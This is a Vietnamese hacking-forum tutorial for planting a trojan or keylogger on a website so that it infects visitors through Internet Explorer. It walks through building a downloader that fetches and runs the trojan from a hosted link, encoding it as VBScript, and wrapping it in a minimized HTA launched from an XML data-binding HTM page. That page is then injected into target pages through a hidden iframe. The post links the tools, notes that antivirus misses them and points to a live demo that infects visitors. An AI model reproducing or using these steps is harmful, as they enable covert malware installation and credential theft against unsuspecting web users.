Đính kèm Trojan vào website

Đính kèm Trojan vào website
Tutorial by aznboy


Đồ nghề cần xài :

+ Trojan, keylogger config sẵn (ví dụ Perfect Keylogger, SC-Keylogger ...).

+ KaoTan FWB V2 : http://undergroundkonnekt.net/faiseur/Kaotanv2.0.rar, cái này hình như Norton chưa quét ra, máy tui chưa bao giờ xài Antivirus nên hông quét thử được, nhưng trên website của Symantec thì chưa có thông tin về con này. Password giải nén là kaotan
+ Exe2VBS : http://ww.packetstormsecurity.nl/trojans/exe2vbs.zip, dùng để chuyển file .exe qua thành một đoạn VB Script.

Đã test với Windows XP SP1 không có AntiVirus, kết quả là OK.



Yêu cầu :

+ Biết đăng ký host, biết cách upload file.

+ Biết xài trojan.

+ Biết xài MS Windows, biết cách Edit text files.



Các bước thực hiện :

1 - Config trojan : Config rùi upload trojan hoặc keylogger của bạn vào một website nào đó cho phép download trực tiếp (hot link).

2 - Config downloader : Download KaoTan về máy, giải nén ra, chạy Configuration.exe, giao diện KaoTan FWB 2.0 như hình dưới, chương trình có khả năng download 2 file cùng một lúc, nếu bạn chỉ cần 1 file thì check off cho cái Url 2. Ghi link của file trojan vào Box Url 1, xong click Build. File KaoTan.exe sẽ được tạo trong cùng thư mục với Configuration.exe. Đây là chương trình được đính kèm trong web, có nhiệm vụ download trojan về và chạy. Nếu trojan của bạn nhỏ hơn 40kb thì bỏ qua bước này.


3 - Tạo file .vbs : Download chương trình exe2vbs về, chạy file Vbs-2-Exe.exe, sau đó kéo file KaoTan.exe vừa config, thả vào khung Exe In, check 2 khung Write Exe to Speacial Folder & Script Auto Excute EXE, chọn thư mục ghi trojan Downloader cái nào cũng được nhưng theo tôi bạn nên chọn thư mục Temp, xong click Do It. Vậy là xong một phần, file KaoTan.exe.vbs sẽ được tạo trong cùng thư mục với KaoTan.exe. File này là đoạn VB Script mã hóa từ KaoTan.exe, có nhiệm vụ tái tạo lại file KaoTan.exe trên máy nạn nhân và chạy file này.


4 - Tạo file .hta & .htm để chạy trojan qua Web Browser : Đổi phần đuôi của KaoTan.exe.vbs lại thành KaoTan.hta, sau đó Edit lại file này, thêm vào phần đầu file dòng <script language=vbs>, dòng cuối WScript.CreateObject("WScript.Shell").run(pth) thay thế bằng đoạn mã sau :

Trích:

Set Shell1 = CreateObject("WScript.Shell")
Shell1.Run(pth)
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>



Okie, vậy là xong file KaoTan.hta, tạo một file KaoTan.htm có nội dung như sau :

Trích:

span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="KaoTan.hta"></object>

]]>
</view>
</preview>
</xml>



Xong, upload 2 file KaoTan.hta và KaoTan.htm lên website của bạn, bạn nên để 2 file chung một folder, nếu không thì phải sửa link trong file KaoTan.htm lại.

5 - Chèn vào website : Bạn muốn nạn nhân mở trang nào thì bị dính trojan ? Mở file đó lên thêm dòng code sau :

Trích:

<iframe style="display:none" src="link đến file KaoTan.htm"></iframe>


Vậy là xong, chúc bạn hack dzui dzẻ, aznboy
Demo tham khảo : aznboy.t35.com (trước khi vô đề nghị chuẩn bị sẵn Keylogger Killer để kill đi, vào trang này dính con Sc-Keylogger
Lưu ý : Không chạy được trên Windows XP SP2, cũng không chạy khi Internet Explorer thiết lập khóa ActiveX Scripts.
Kaotanv2.0.rar --> pass: kaotan



Posted by Rua(VNISS)